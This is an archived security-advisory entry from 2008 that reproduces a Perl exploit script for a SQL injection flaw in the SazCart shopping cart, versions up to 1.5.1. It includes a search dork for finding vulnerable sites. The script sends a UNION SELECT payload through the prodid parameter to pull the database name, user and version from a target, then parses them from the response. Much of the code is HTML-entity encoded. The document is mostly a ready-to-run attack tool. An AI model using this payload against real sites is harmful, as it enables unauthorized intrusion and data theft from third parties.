SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit

2008-05-11T00:00:00
ID SECURITYVULNS:DOC:19823
Type securityvulns
Reporter Securityvulns
Modified 2008-05-11T00:00:00

Description

!/usr/bin/perl

SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit

HomePage: http://www.sazcart.com

Discovered & Coded by JosS

Contact: sys-project[at]hotmail.com

Spanish Hackers Team / Sys - Project / EspSeC

http://www.spanish-hackers.com

rgod forever :D

Dork: "Powered by SazCart"

print "\t\t########################################################\n\n"; print "\t\t# SazCart <= v1.5.1 - Remote SQL Injection Exploit #\n\n"; print "\t\t# by JosS #\n\n"; print "\t\t########################################################\n\n";

use strict; use LWP::UserAgent;

my $victim = $ARGV[0];

if(!$ARGV[0]) { print "\n[x] SazCart <= v1.5.1 - Remote SQL Injection Exploit\n"; print "[x] written by JosS - sys-project[at]hotmail.com\n"; print "[x] usage: perl xpl.pl [host]\n"; print "[x] example: http://localhost/path/\n\n"; exit(1); }

print &quot;&#92;n[+] Exploiting...&#92;n&quot;;
my $cnx = LWP::UserAgent-&gt;new&#40;&#41; or die;
my $go=$cnx-&gt;get&#40;$victim.&quot;?details&amp;prodid=1&#39;+union+all+select+0,1,convert&#40;concat&#40;database&#40;&#41;,char&#40;58&#41;,user&#40;&#41;,char&#40;58&#41;,version&#40;&#41;&#41;,char&#41;,3,4/*&quot;&#41;;
if &#40;$go-&gt;content =~ m/Price&lt;&#92;/b&gt;&#92;:&#40;.*?&#41;&#92;&lt;br/ms&#41;

{ print "[+] $1\n\n"; } else { print "\n[-] exploit failed\n"; }